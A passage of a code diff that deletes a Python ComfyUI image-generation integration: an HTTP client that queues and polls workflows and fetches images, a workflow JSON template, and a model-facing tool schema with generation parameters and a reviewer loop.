`cached()` only. `generation._warm_project` is what fills it.
|
||||
"""
|
||||
from lembas.services.agent import instructions as instructions_service
|
||||
|
||||
agents = settings_store.agents(db)
|
||||
blank = {"agent_instructions": "", "agent_instructions_file": ""}
|
||||
if not agents.get("instructions_enabled"):
|
||||
return blank
|
||||
budget = int(agents.get("instructions_chars") or 0)
|
||||
if budget <= 0:
|
||||
return blank
|
||||
|
||||
profile_id = getattr(chat, "ssh_profile_id", "") or ""
|
||||
found = instructions_service.cached(profile_id, context.project_dir)
|
||||
text = instructions_service.render(found, budget)
|
||||
if not text:
|
||||
return blank
|
||||
return {"agent_instructions": text, "agent_instructions_file": found.filename}
|
||||
|
||||
|
||||
def _project_files(db: DBSession, chat, context, settings_store, index_service) -> str:
|
||||
"""The directory listing, *read from cache and never fetched*.
|
||||
|
||||
|
||||
@@ -1,13 +0,0 @@
|
||||
"""Making pictures, on a ComfyUI somebody else is running.
|
||||
|
||||
Three modules, split along the same seam the rest of the codebase uses:
|
||||
`comfy.py` speaks HTTP and knows nothing about chats, `workflow.py` turns a
|
||||
stored template plus a model's arguments into the document ComfyUI wants, and
|
||||
`tool.py` is the `ToolDef` that ties them to a conversation.
|
||||
|
||||
Nothing here executes anything locally. That is the same rule agent chats
|
||||
follow: the work happens on a service reached over HTTP, chosen and configured
|
||||
by an administrator, and the security of it is the security of that service.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
@@ -1,52 +0,0 @@
|
||||
{
|
||||
"3": {
|
||||
"inputs": {
|
||||
"seed": "{{seed}}",
|
||||
"steps": "{{steps}}",
|
||||
"cfg": "{{cfg}}",
|
||||
"sampler_name": "{{sampler}}",
|
||||
"scheduler": "{{scheduler}}",
|
||||
"denoise": "{{denoise}}",
|
||||
"model": ["4", 0],
|
||||
"positive": ["6", 0],
|
||||
"negative": ["7", 0],
|
||||
"latent_image": ["5", 0]
|
||||
},
|
||||
"class_type": "KSampler",
|
||||
"_meta": { "title": "KSampler" }
|
||||
},
|
||||
"4": {
|
||||
"inputs": { "ckpt_name": "{{model}}" },
|
||||
"class_type": "CheckpointLoaderSimple",
|
||||
"_meta": { "title": "Load Checkpoint" }
|
||||
},
|
||||
"5": {
|
||||
"inputs": {
|
||||
"width": "{{width}}",
|
||||
"height": "{{height}}",
|
||||
"batch_size": "{{batch}}"
|
||||
},
|
||||
"class_type": "EmptyLatentImage",
|
||||
"_meta": { "title": "Empty Latent Image" }
|
||||
},
|
||||
"6": {
|
||||
"inputs": { "text": "{{prompt}}", "clip": ["4", 1] },
|
||||
"class_type": "CLIPTextEncode",
|
||||
"_meta": { "title": "CLIP Text Encode (Prompt)" }
|
||||
},
|
||||
"7": {
|
||||
"inputs": { "text": "{{negative}}", "clip": ["4", 1] },
|
||||
"class_type": "CLIPTextEncode",
|
||||
"_meta": { "title": "CLIP Text Encode (Negative)" }
|
||||
},
|
||||
"8": {
|
||||
"inputs": { "samples": ["3", 0], "vae": ["4", 2] },
|
||||
"class_type": "VAEDecode",
|
||||
"_meta": { "title": "VAE Decode" }
|
||||
},
|
||||
"9": {
|
||||
"inputs": { "filename_prefix": "LLeMbas", "images": ["8", 0] },
|
||||
"class_type": "SaveImage",
|
||||
"_meta": { "title": "Save Image" }
|
||||
}
|
||||
}
|
||||
@@ -1,374 +0,0 @@
|
||||
"""Talking to ComfyUI.
|
||||
|
||||
Four calls and a discovery one, all plain httpx. `fetch.fetch` cannot be reused
|
||||
for the same reasons `custom_tools` gives -- it is GET-only, bodyless, and
|
||||
refuses every content type that is not HTML or text, which is both the JSON here
|
||||
and the PNG at the end of it.
|
||||
|
||||
**The base URL is exempt from the SSRF guard, and that is deliberate rather than
|
||||
forgotten.** `fetch.check_url` exists to stop a *model or a reader* pointing the
|
||||
application at something on the private network; this address was typed by an
|
||||
administrator into the admin page, exactly like `Connection.base_url` and the two
|
||||
audio endpoints, none of which are checked either. Saying so here because the
|
||||
default value is `127.0.0.1:8188`, which is precisely the shape the guard exists
|
||||
to refuse and therefore looks like a hole rather than a decision.
|
||||
|
||||
Progress is **polled, not streamed**. ComfyUI offers a WebSocket for it, and
|
||||
holding one open for the length of a generation is the live-connection state the
|
||||
whole `agent/ssh.py` design forbids; polling `/history` is self-healing across a
|
||||
restart of either side, and the thing being waited for takes tens of seconds, so
|
||||
a poll costs nothing anybody can measure.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import json
|
||||
import logging
|
||||
import time
|
||||
import uuid
|
||||
from dataclasses import dataclass
|
||||
from typing import Any
|
||||
|
||||
import httpx
|
||||
|
||||
from lembas.services.llm.openai_client import (
|
||||
LLMError,
|
||||
describe_http_error,
|
||||
)
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# What one generated image may weigh. A cap is required rather than tidy: this is
|
||||
# the only place in the codebase where an external service hands back raw bytes
|
||||
# that are then written to disk, and neither `audio.speak` nor `openai_client`
|
||||
# has one to copy. Generous, because a 2048px PNG is a legitimate several
|
||||
# megabytes and refusing it would be refusing the feature.
|
||||
MAX_IMAGE_BYTES = 32 * 1024 * 1024
|
||||
|
||||
# How often to ask whether it has finished, and how long to keep asking. The
|
||||
# interval is not adaptive: unlike a background job, which may run for hours,
|
||||
# a generation is over in tens of seconds and the whole reply is parked on it.
|
||||
POLL_INTERVAL = 1.0
|
||||
# How long to wait for the queue *before* our own job starts running. A busy
|
||||
# ComfyUI with somebody else's batch in front of us is not an error.
|
||||
DEFAULT_TIMEOUT = 600.0
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Config:
|
||||
"""Everything a call needs, lifted out of the settings group.
|
||||
|
||||
A snapshot rather than a session, for the reason `ToolContext` is one: a
|
||||
generation outlives the request that resolved it.
|
||||
"""
|
||||
|
||||
base_url: str
|
||||
api_key: str = ""
|
||||
timeout: float = DEFAULT_TIMEOUT
|
||||
|
||||
@property
|
||||
def configured(self) -> bool:
|
||||
return bool(self.base_url)
|
||||
|
||||
def url(self, path: str) -> str:
|
||||
return f"{self.base_url.rstrip('/')}/{path.lstrip('/')}"
|
||||
|
||||
def headers(self) -> dict[str, str]:
|
||||
# ComfyUI itself has no auth; a key is only ever for something in front
|
||||
# of it, so an empty one must not become `Authorization: Bearer `.
|
||||
return {"Authorization": f"Bearer {self.api_key}"} if self.api_key else {}
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Ref:
|
||||
"""Where a finished image lives on the far side."""
|
||||
|
||||
filename: str
|
||||
subfolder: str = ""
|
||||
kind: str = "output"
|
||||
|
||||
|
||||
class ComfyError(LLMError):
|
||||
"""Anything that stopped a generation, in words worth showing somebody."""
|
||||
|
||||
|
||||
class OutOfMemory(ComfyError):
|
||||
"""The far side ran out of VRAM.
|
||||
|
||||
Its own class because it is the one failure with an obvious next move --
|
||||
a smaller picture, or a smaller checkpoint -- and the model is told to make
|
||||
it. Everything else is reported and stopped at.
|
||||
"""
|
||||
|
||||
|
||||
class Interrupted(ComfyError):
|
||||
"""Somebody cancelled it from ComfyUI's own interface, or it was stopped.
|
||||
|
||||
Distinct because it is not a fault: retrying is reasonable, and "the
|
||||
workflow failed" would be describing a decision as a breakage.
|
||||
"""
|
||||
|
||||
|
||||
# What `exception_type` looks like when a GPU has run out. Matched on the type
|
||||
# rather than on the message, which is a paragraph of allocator advice written
|
||||
# for whoever is running the box and not for a model.
|
||||
_OOM_TYPES = ("outofmemory", "out_of_memory", "cuda error: out of memory")
|
||||
|
||||
|
||||
def _transport_error(exc: httpx.RequestError, config: Config) -> ComfyError:
|
||||
"""The `wrap_transport_error` shape, said about ComfyUI rather than an LLM.
|
||||
|
||||
Not reused directly: that one names the request timeout from the deployment
|
||||
settings, which is not the timeout in force here.
|
||||
"""
|
||||
if isinstance(exc, httpx.ConnectError):
|
||||
return ComfyError(
|
||||
f"Could not reach ComfyUI at {config.base_url}. Is it running and the URL correct?"
|
||||
)
|
||||
if isinstance(exc, httpx.TimeoutException):
|
||||
return ComfyError(f"ComfyUI at {config.base_url} did not respond in time.")
|
||||
return ComfyError(f"Could not reach ComfyUI at {config.base_url}: {exc}")
|
||||
|
||||
|
||||
async def _get_json(config: Config, path: str, *, timeout: float = 30.0) -> Any:
|
||||
try:
|
||||
async with httpx.AsyncClient(timeout=timeout) as client:
|
||||
response = await client.get(config.url(path), headers=config.headers())
|
||||
response.raise_for_status()
|
||||
return response.json()
|
||||
except httpx.HTTPStatusError as exc:
|
||||
raise ComfyError(describe_http_error(exc), status_code=exc.response.status_code) from exc
|
||||
except httpx.RequestError as exc:
|
||||
raise _transport_error(exc, config) from exc
|
||||
except (ValueError, json.JSONDecodeError) as exc:
|
||||
raise ComfyError(f"ComfyUI sent something that is not JSON: {exc}") from exc
|
||||
|
||||
|
||||
async def submit(config: Config, workflow: dict[str, Any]) -> str:
|
||||
"""Queue a workflow, and answer with the id it was given.
|
||||
|
||||
A `node_errors` block is a refusal rather than a failure: the workflow was
|
||||
accepted as JSON and rejected as a graph, usually because a checkpoint name
|
||||
does not exist on that machine. It is reported with the node named, because
|
||||
"invalid prompt" against a twelve-node document says nothing.
|
||||
"""
|
||||
body = {"prompt": workflow, "client_id": uuid.uuid4().hex}
|
||||
try:
|
||||
async with httpx.AsyncClient(timeout=60.0) as client:
|
||||
response = await client.post(config.url("prompt"), headers=config.headers(), json=body)
|
||||
if response.status_code >= 400:
|
||||
raise ComfyError(_refusal(response))
|
||||
data = response.json()
|
||||
except ComfyError:
|
||||
raise
|
||||
except httpx.RequestError as exc:
|
||||
raise _transport_error(exc, config) from exc
|
||||
except (ValueError, json.JSONDecodeError) as exc:
|
||||
raise ComfyError(f"ComfyUI sent something that is not JSON: {exc}") from exc
|
||||
|
||||
if errors := (data.get("node_errors") or {}):
|
||||
raise ComfyError(_describe_nodes(errors))
|
||||
prompt_id = str(data.get("prompt_id") or "")
|
||||
if not prompt_id:
|
||||
raise ComfyError("ComfyUI accepted the workflow but did not say what to call it.")
|
||||
return prompt_id
|
||||
|
||||
|
||||
def _refusal(response: httpx.Response) -> str:
|
||||
"""Why ComfyUI would not take a workflow, in one sentence."""
|
||||
try:
|
||||
payload = response.json()
|
||||
except (ValueError, json.JSONDecodeError):
|
||||
return f"ComfyUI refused the workflow (HTTP {response.status_code})."
|
||||
if isinstance(payload, dict):
|
||||
if errors := (payload.get("node_errors") or {}):
|
||||
return _describe_nodes(errors)
|
||||
if message := payload.get("error"):
|
||||
if isinstance(message, dict):
|
||||
message = message.get("message") or message.get("type") or ""
|
||||
return f"ComfyUI refused the workflow: {message}"
|
||||
return f"ComfyUI refused the workflow (HTTP {response.status_code})."
|
||||
|
||||
|
||||
def _describe_nodes(errors: dict[str, Any]) -> str:
|
||||
parts: list[str] = []
|
||||
for node, detail in list(errors.items())[:4]:
|
||||
messages = detail.get("errors") if isinstance(detail, dict) else None
|
||||
first = ""
|
||||
if isinstance(messages, list) and messages:
|
||||
entry = messages[0]
|
||||
first = entry.get("message", "") if isinstance(entry, dict) else str(entry)
|
||||
parts.append(f"node {node}: {first}" if first else f"node {node}")
|
||||
return "ComfyUI refused the workflow — " + "; ".join(parts)
|
||||
|
||||
|
||||
async def await_images(config: Config, prompt_id: str) -> list[Ref]:
|
||||
"""Wait for one queued workflow and answer with what it saved.
|
||||
|
||||
**The record existing is what "finished" means, not `status.completed`.**
|
||||
ComfyUI writes the history entry in `task_done` and nowhere else, so it
|
||||
appears exactly once the job is over -- but it sets `completed=e.success`,
|
||||
so a run that failed is `completed: false` for ever. Waiting on that flag
|
||||
means every out-of-memory, every cancelled job and every broken node hangs
|
||||
the reply for the whole timeout and then reports a timeout, when ComfyUI
|
||||
knew what was wrong within seconds and said so.
|
||||
|
||||
So: no record means not yet, a record means done, and `status_str` says
|
||||
which kind of done.
|
||||
"""
|
||||
deadline = time.monotonic() + config.timeout
|
||||
while True:
|
||||
record = (await _get_json(config, f"history/{prompt_id}")).get(prompt_id)
|
||||
if isinstance(record, dict) and record.get("status") is not None:
|
||||
status = record.get("status") or {}
|
||||
if status.get("status_str") != "success":
|
||||
raise _failure(status)
|
||||
return _refs_in(record.get("outputs") or {})
|
||||
if time.monotonic() > deadline:
|
||||
raise ComfyError(
|
||||
f"ComfyUI did not finish within {config.timeout:.0f}s. "
|
||||
"It may still be working; the queue is on its own page."
|
||||
)
|
||||
await asyncio.sleep(POLL_INTERVAL)
|
||||
|
||||
|
||||
def _failure(status: dict[str, Any]) -> ComfyError:
|
||||
"""Why a workflow stopped, out of the messages ComfyUI recorded against it.
|
||||
|
||||
`status.messages` is a list of `[name, payload]` pairs -- the lifecycle of
|
||||
the run. The last `execution_error` or `execution_interrupted` in it is the
|
||||
thing that ended it, and carries the node and the exception. Without reading
|
||||
these the only thing that could be said is "error", which is what ComfyUI's
|
||||
own status string amounts to.
|
||||
"""
|
||||
event, payload = "", {}
|
||||
for entry in status.get("messages") or []:
|
||||
if isinstance(entry, list | tuple) and len(entry) == 2:
|
||||
name, body = entry
|
||||
if name in ("execution_error", "execution_interrupted"):
|
||||
event, payload = str(name), body if isinstance(body, dict) else {}
|
||||
|
||||
node = str(payload.get("node_type") or "").strip()
|
||||
where = f" in {node}" if node else ""
|
||||
|
||||
if event == "execution_interrupted":
|
||||
return Interrupted(f"The image was cancelled on the ComfyUI side{where}.")
|
||||
|
||||
kind = str(payload.get("exception_type") or "")
|
||||
detail = _first_sentence(str(payload.get("exception_message") or ""))
|
||||
if any(marker in kind.lower() for marker in _OOM_TYPES) or "out of memory" in detail.lower():
|
||||
return OutOfMemory(f"ComfyUI ran out of video memory{where}. {detail}".strip())
|
||||
if not detail and not kind:
|
||||
return ComfyError(f"ComfyUI could not finish the workflow{where}.")
|
||||
return ComfyError(f"ComfyUI could not finish the workflow{where}: {detail or kind}")
|
||||
|
||||
|
||||
def _first_sentence(message: str) -> str:
|
||||
"""Enough of an exception to act on, and no more.
|
||||
|
||||
A torch OOM runs to several lines of allocator advice -- environment
|
||||
variables to set, fragmentation notes -- addressed to whoever runs the box.
|
||||
None of it means anything to a model, and all of it costs tokens in a tool
|
||||
result that is already a failure.
|
||||
"""
|
||||
first = message.strip().split("\n", 1)[0].strip()
|
||||
if len(first) > 200:
|
||||
first = first[:200].rsplit(" ", 1)[0] + "…"
|
||||
return first
|
||||
|
||||
|
||||
def _refs_in(outputs: dict[str, Any]) -> list[Ref]:
|
||||
"""Every image any node saved, in node order.
|
||||
|
||||
Every node is read rather than a `SaveImage` being looked for by name: a
|
||||
template is somebody else's document and may save from a node called
|
||||
anything, or from two of them.
|
||||
"""
|
||||
refs: list[Ref] = []
|
||||
for node in outputs.values():
|
||||
for image in (node or {}).get("images") or []:
|
||||
if filename := str(image.get("filename") or ""):
|
||||
refs.append(
|
||||
Ref(
|
||||
filename=filename,
|
||||
subfolder=str(image.get("subfolder") or ""),
|
||||
kind=str(image.get("type") or "output"),
|
||||
)
|
||||
)
|
||||
return refs
|
||||
|
||||
|
||||
async def fetch_image(config: Config, ref: Ref) -> bytes:
|
||||
"""The bytes of one finished image."""
|
||||
params = {"filename": ref.filename, "subfolder": ref.subfolder, "type": ref.kind}
|
||||
try:
|
||||
async with httpx.AsyncClient(timeout=120.0) as client:
|
||||
response = await client.get(config.url("view"), headers=config.headers(), params=params)
|
||||
response.raise_for_status()
|
||||
payload = response.content
|
||||
except httpx.HTTPStatusError as exc:
|
||||
raise ComfyError(describe_http_error(exc), status_code=exc.response.status_code) from exc
|
||||
except httpx.RequestError as exc:
|
||||
raise _transport_error(exc, config) from exc
|
||||
|
||||
if not payload:
|
||||
raise ComfyError(f"ComfyUI returned an empty file for {ref.filename}.")
|
||||
if len(payload) > MAX_IMAGE_BYTES:
|
||||
raise ComfyError(
|
||||
f"{ref.filename} is {len(payload) // (1024 * 1024)}MB, over the "
|
||||
f"{MAX_IMAGE_BYTES // (1024 * 1024)}MB limit."
|
||||
)
|
||||
return payload
|
||||
|
||||
|
||||
async def free(config: Config) -> None:
|
||||
"""Ask ComfyUI to drop its models from memory.
|
||||
|
||||
Best-effort by design and never raised into the caller: this runs on the way
|
||||
out of a generation that has already produced its image, and failing the
|
||||
whole tool because a memory hint was refused would be turning a tidy-up into
|
||||
an error. The consequence of it silently not working is VRAM staying used,
|
||||
which is the state Preserve VRAM was already in before it was switched on.
|
||||
"""
|
||||
try:
|
||||
async with httpx.AsyncClient(timeout=30.0) as client:
|
||||
await client.post(
|
||||
config.url("free"),
|
||||
headers=config.headers(),
|
||||
json={"unload_models": True, "free_memory": True},
|
||||
)
|
||||
except Exception: # noqa: BLE001 - a hint that failed is not a failed generation
|
||||
log.debug("could not free ComfyUI at %s", config.base_url, exc_info=True)
|
||||
|
||||
|
||||
async def discover(config: Config) -> tuple[list[str], list[str], list[str]]:
|
||||
"""What this ComfyUI can actually do: checkpoints, samplers, schedulers.
|
||||
|
||||
For the admin page only. Never called from the request path -- the tool
|
||||
reads the stored lists, exactly as the project listing is read from a cache
|
||||
rather than walked, because a keystroke must not wait on a machine.
|
||||
"""
|
||||
checkpoints = _options(
|
||||
await _get_json(config, "object_info/CheckpointLoaderSimple"),
|
||||
"CheckpointLoaderSimple",
|
||||
"ckpt_name",
|
||||
)
|
||||
sampler_info = await _get_json(config, "object_info/KSampler")
|
||||
samplers = _options(sampler_info, "KSampler", "sampler_name")
|
||||
schedulers = _options(sampler_info, "KSampler", "scheduler")
|
||||
return checkpoints, samplers, schedulers
|
||||
|
||||
|
||||
def _options(payload: Any, node: str, field: str) -> list[str]:
|
||||
"""The allowed values of one input, out of an `/object_info` document.
|
||||
|
||||
The shape is `{node: {input: {required: {field: [[...values], {...meta}]}}}}`
|
||||
-- a list whose first element is the list of options. Read defensively: this
|
||||
is somebody else's schema and a custom node pack can change it.
|
||||
"""
|
||||
try:
|
||||
spec = payload[node]["input"]["required"][field][0]
|
||||
except (KeyError, IndexError, TypeError):
|
||||
return []
|
||||
return [str(value) for value in spec] if isinstance(spec, list) else []
|
||||
@@ -1,725 +0,0 @@
|
||||
"""The tool that makes a picture, and the loop that decides to keep it.
|
||||
|
||||
One call is one finished image. The alternative -- return every attempt to the
|
||||
conversation and let the model decide whether to call again -- costs a full
|
||||
round per retry, makes the ceiling advisory rather than enforced, and shows the
|
||||
reader every reject on the way past. So the retrying happens here, and what
|
||||
comes back is the image that was kept.
|
||||
|
||||
**Three things are ordered rather than incidental.**
|
||||
|
||||
*The reviewer is asked about bytes, not about a row.* An attempt that is going
|
||||
to be thrown away should not leave an `Attachment` behind, so the judge is shown
|
||||
a downscaled preview built in memory and only the kept image is ever written.
|
||||
|
||||
*Preserve VRAM swaps around the review, not around the tool.* The sequence is
|
||||
unload the LLM, generate, free ComfyUI, ask the reviewer (which loads the LLM
|
||||
again), and round once more if it said no. Two model loads per retry, which is
|
||||
why the two settings are independent and the admin page says so.
|
||||
|
||||
*Nothing loads the LLM back at the end.* The reply's next request does it, and
|
||||
llama-swap -- or Ollama, or anything else worth pointing this at -- loads on
|
||||
demand. A step that exists in the description and not in the code looks like an
|
||||
omission, so it is said here instead.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
import re
|
||||
from dataclasses import dataclass
|
||||
from typing import Any
|
||||
|
||||
import httpx
|
||||
from sqlalchemy import select
|
||||
|
||||
from lembas.services.images import comfy, workflow
|
||||
from lembas.services.llm.openai_client import Endpoint, LLMError, complete
|
||||
from lembas.services.tools import RISK_WRITE, ToolContext, ToolDef, ToolOutcome
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# What the reviewer is allowed to write back. It is one verdict and one line of
|
||||
# reason, and a model that writes an essay about a picture is a model whose
|
||||
# answer nobody reads.
|
||||
MAX_VERDICT_TOKENS = 200
|
||||
|
||||
# How long to wait for a connection to admit it has unloaded. Short: this is a
|
||||
# hint before a slow operation, and a machine that will not answer it is one
|
||||
# where the generation should go ahead anyway rather than fail.
|
||||
UNLOAD_TIMEOUT = 30.0
|
||||
|
||||
SCHEMA: dict[str, Any] = {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
# First, and the only required one, because `tools.parse_arguments`
|
||||
# puts the whole raw string into the first required parameter when a
|
||||
# model emits arguments that are not valid JSON. That failure is common
|
||||
# with small models, and this way it degrades into a prompt rather than
|
||||
# into a seed.
|
||||
"prompt": {
|
||||
"type": "string",
|
||||
"description": "What to draw. Describe the subject, the setting and the style.",
|
||||
},
|
||||
# Every description below says what the value *does to the picture* and
|
||||
# when to move it, not what it is called. A model that is told "cfg:
|
||||
# prompt adherence, default 8" has been told nothing it can act on, and
|
||||
# the observable result is a model that sends the prompt alone and
|
||||
# leaves ten parameters at their defaults for ever.
|
||||
"negative": {
|
||||
"type": "string",
|
||||
"description": (
|
||||
"Comma-separated things to keep OUT of the picture, as plain nouns and "
|
||||
"adjectives: 'blurry, extra fingers, text, watermark'. Not a sentence, "
|
||||
"and never phrased as an instruction — 'do not add text' puts *text* in "
|
||||
"the picture. Defaults to 'text, watermark'."
|
||||
),
|
||||
},
|
||||
"template": {
|
||||
"type": "string",
|
||||
"description": "Which workflow to use. Omit to use this chat's usual one.",
|
||||
},
|
||||
"model": {
|
||||
"type": "string",
|
||||
"description": (
|
||||
"Which checkpoint to draw with. Pick by what it is good at; omit to use "
|
||||
"this chat's usual one."
|
||||
),
|
||||
},
|
||||
"seed": {
|
||||
"type": "integer",
|
||||
"description": (
|
||||
"Omit it, or pass -1, for a new random image. Repeat a seed you were "
|
||||
"told about to get that same image again — which is how you change one "
|
||||
"thing about a picture and keep the rest."
|
||||
),
|
||||
},
|
||||
"steps": {
|
||||
"type": "integer",
|
||||
"description": (
|
||||
"How long to refine, 1-150. Default 20. Around 20-30 for most things; "
|
||||
"8-12 for a quick draft or when several are wanted; 40+ only for fine "
|
||||
"detail, and past about 50 it stops improving and only costs time."
|
||||
),
|
||||
},
|
||||
"cfg": {
|
||||
"type": "number",
|
||||
"description": (
|
||||
"How literally to follow the prompt, 0-30. Default 8. 3-6 gives the "
|
||||
"model room and looks more natural; 7-9 is the usual range; 12+ forces "
|
||||
"the words through and starts to look burnt and over-saturated. Lower "
|
||||
"it if the picture looks harsh, raise it if the subject is being "
|
||||
"ignored."
|
||||
),
|
||||
},
|
||||
"width": {
|
||||
"type": "integer",
|
||||
"description": (
|
||||
"Pixels, 64-2048, a multiple of 8. Default 512. Use the size the "
|
||||
"checkpoint was trained for — about 512 for SD1.5, about 1024 for SDXL "
|
||||
"— and change the ratio rather than the total: 512x768 for a portrait, "
|
||||
"768x512 for a landscape. Going far above what the checkpoint expects "
|
||||
"produces duplicated limbs and repeated horizons, not more detail."
|
||||
),
|
||||
},
|
||||
"height": {
|
||||
"type": "integer",
|
||||
"description": (
|
||||
"Pixels, 64-2048, a multiple of 8. Default 512. See width: the aspect "
|
||||
"ratio is the thing to choose, and taller than wide suits a person, "
|
||||
"wider than tall suits a place."
|
||||
),
|
||||
},
|
||||
"sampler": {
|
||||
"type": "string",
|
||||
"description": (
|
||||
"How the image is solved. Default euler. 'euler' is safe and fast; "
|
||||
"'dpmpp_2m' is a good general improvement; 'dpmpp_2m_sde' for more "
|
||||
"texture; 'ddim' for a clean flat look. Leave it out unless you have a "
|
||||
"reason."
|
||||
),
|
||||
},
|
||||
"scheduler": {
|
||||
"type": "string",
|
||||
"description": (
|
||||
"How the steps are spaced. Default normal. 'karras' pairs well with the "
|
||||
"dpmpp samplers and usually helps at low step counts; 'normal' "
|
||||
"otherwise. Leave it out unless you are also setting the sampler."
|
||||
),
|
||||
},
|
||||
"denoise": {
|
||||
"type": "number",
|
||||
"description": (
|
||||
"How much of the starting noise to replace, 0-1. Default 1, which is "
|
||||
"what you want for a picture drawn from nothing. Lower values only mean "
|
||||
"something for a workflow that starts from an existing image."
|
||||
),
|
||||
},
|
||||
},
|
||||
"required": ["prompt"],
|
||||
}
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Attempt:
|
||||
"""One generated image and what was decided about it."""
|
||||
|
||||
number: int
|
||||
seed: int
|
||||
kept: bool
|
||||
verdict: str = ""
|
||||
|
||||
|
||||
def config_of(context: ToolContext) -> comfy.Config:
|
||||
"""The client snapshot, with the key decrypted at the last moment."""
|
||||
from lembas.services.crypto import decrypt
|
||||
|
||||
values = context.image_config or {}
|
||||
return comfy.Config(
|
||||
base_url=str(values.get("base_url") or ""),
|
||||
api_key=decrypt(str(values.get("api_key_encrypted") or "")),
|
||||
timeout=float(values.get("timeout") or comfy.DEFAULT_TIMEOUT),
|
||||
)
|
||||
|
||||
|
||||
def _choices(db, values: dict[str, Any]) -> tuple[list[Any], list[str]]:
|
||||
"""The templates and checkpoints on offer, for the schema and the harness."""
|
||||
from lembas.db.models import ImageWorkflow
|
||||
|
||||
rows = list(
|
||||
db.scalars(
|
||||
select(ImageWorkflow)
|
||||
.where(ImageWorkflow.enabled.is_(True))
|
||||
.order_by(ImageWorkflow.position, ImageWorkflow.slug)
|
||||
)
|
||||
)
|
||||
return rows, [str(name) for name in (values.get("checkpoints") or [])]
|
||||
|
||||
|
||||
_DEFAULT_SENTENCE = re.compile(r"Default ([^.,]+)([.,])")
|
||||
|
||||
|
||||
def _restate_defaults(schema: dict[str, Any], values: dict[str, Any]) -> None:
|
||||
"""Rewrite each "Default 20." to say what this instance actually uses.
|
||||
|
||||
Every one of those descriptions was written when there was one set of
|
||||
defaults in the world. Now an administrator can move them, and a schema
|
||||
still saying "Default 512" beside an instance that draws at 1024 is worse
|
||||
than saying nothing: the model reasons from it, decides 512 is fine for the
|
||||
SDXL checkpoint it was handed, and omits the parameter — arriving at the
|
||||
right behaviour for the wrong reason, or the wrong one silently.
|
||||
|
||||
A rewrite rather than a `{default}` placeholder in the prose, because the
|
||||
sentence around it differs per parameter and half of them go on to say what
|
||||
to do *instead* of the default. The regex keeps the punctuation it found,
|
||||
since `denoise` says "Default 1, which is…" and the rest use a full stop.
|
||||
"""
|
||||
resolved = workflow.resolve({}, settings=values)
|
||||
for name, spec in schema.get("properties", {}).items():
|
||||
if name not in resolved or name in ("prompt", "seed", "model", "template"):
|
||||
continue
|
||||
shown = resolved[name]
|
||||
# A float that is whole reads better as "8" than "8.0", and this is the
|
||||
# text a model reasons about.
|
||||
if isinstance(shown, float) and shown.is_integer():
|
||||
shown = int(shown)
|
||||
spec["description"] = _DEFAULT_SENTENCE.sub(
|
||||
# Bound now rather than closed over: `shown` is a loop variable, and
|
||||
# a lambda reading it later would restate every description with the
|
||||
# last parameter's value.
|
||||
lambda match, shown=shown: f"Default {shown}{match.group(2)}",
|
||||
spec["description"],
|
||||
count=1,
|
||||
)
|
||||
|
||||
|
||||
def schema_for(db, values: dict[str, Any]) -> dict[str, Any]:
|
||||
"""The parameter schema, with this instance's own choices in it.
|
||||
|
||||
`template` and `model` become enums because a name that does not exist is a
|
||||
refusal from ComfyUI and a wasted round; `sampler` and `scheduler` stay
|
||||
plain strings because there are forty-four and nine of them, and an enum
|
||||
that size costs tokens on every request forever to prevent a mistake worth
|
||||
one sentence of correction.
|
||||
"""
|
||||
rows, checkpoints = _choices(db, values)
|
||||
schema = json.loads(json.dumps(SCHEMA))
|
||||
_restate_defaults(schema, values)
|
||||
if rows:
|
||||
schema["properties"]["template"]["enum"] = [row.slug for row in rows]
|
||||
schema["properties"]["template"]["description"] = "Which workflow to use. " + "; ".join(
|
||||
f"{row.slug}: {row.description or row.name}" for row in rows[:12]
|
||||
)
|
||||
if checkpoints:
|
||||
schema["properties"]["model"]["enum"] = checkpoints
|
||||
return schema
|
||||
|
||||
|
||||
def tool_def(db, values: dict[str, Any]) -> ToolDef:
|
||||
return ToolDef(
|
||||
name="image_generate",
|
||||
family="image",
|
||||
description=(
|
||||
"Draw a picture from a description and show it to the person you are "
|
||||
"talking to. Returns once the image has been made and is on screen."
|
||||
),
|
||||
parameters=schema_for(db, values),
|
||||
run=run,
|
||||
# Not RISK_READ: it spends somebody's GPU for a minute and puts a new
|
||||
# artefact in the conversation. In an agent chat that means the mode
|
||||
# decides whether to ask first, which is the right answer for a call
|
||||
# that cannot be undone by reading something again.
|
||||
risk=RISK_WRITE,
|
||||
)
|
||||
|
||||
|
||||
# --- Preserve VRAM -------------------------------------------------------------
|
||||
async def _unload_llm(context: ToolContext) -> bool:
|
||||
"""Ask this chat's own endpoint to drop its model. Best-effort.
|
||||
|
||||
*This chat's own* is the whole of the design. The unload hook is a column on
|
||||
`Connection`, so a chat talking to a local llama-swap unloads that and a
|
||||
chat talking to a box on the network unloads nothing -- its VRAM is not the
|
||||
VRAM ComfyUI is about to want.
|
||||
"""
|
||||
from lembas.db.models import Connection
|
||||
from lembas.db.session import session_scope
|
||||
|
||||
url = ""
|
||||
method = "POST"
|
||||
try:
|
||||
with session_scope() as db:
|
||||
connection = db.get(Connection, context.connection_id)
|
||||
if connection is not None:
|
||||
url = (connection.unload_url or "").strip()
|
||||
method = (connection.unload_method or "POST").upper()
|
||||
except Exception: # noqa: BLE001 - a hint that could not be looked up is not a failure
|
||||
log.debug("could not read the unload hook", exc_info=True)
|
||||
return False
|
||||
|
||||
if not url:
|
||||
return False
|
||||
try:
|
||||
async with httpx.AsyncClient(timeout=UNLOAD_TIMEOUT) as client:
|
||||
await client.request(method, url)
|
||||
return True
|
||||
except Exception: # noqa: BLE001 - see the module docstring: a hint, not a step
|
||||
log.info("could not unload the model at %s", url, exc_info=True)
|
||||
return False
|
||||
|
||||
|
||||
# --- The reviewer --------------------------------------------------------------
|
||||
def _reviewer(context: ToolContext) -> tuple[Endpoint, str] | None:
|
||||
"""The model that judges an image, or None if there is nobody to ask.
|
||||
|
||||
The admin's choice first, then the chat's own model when it has vision. A
|
||||
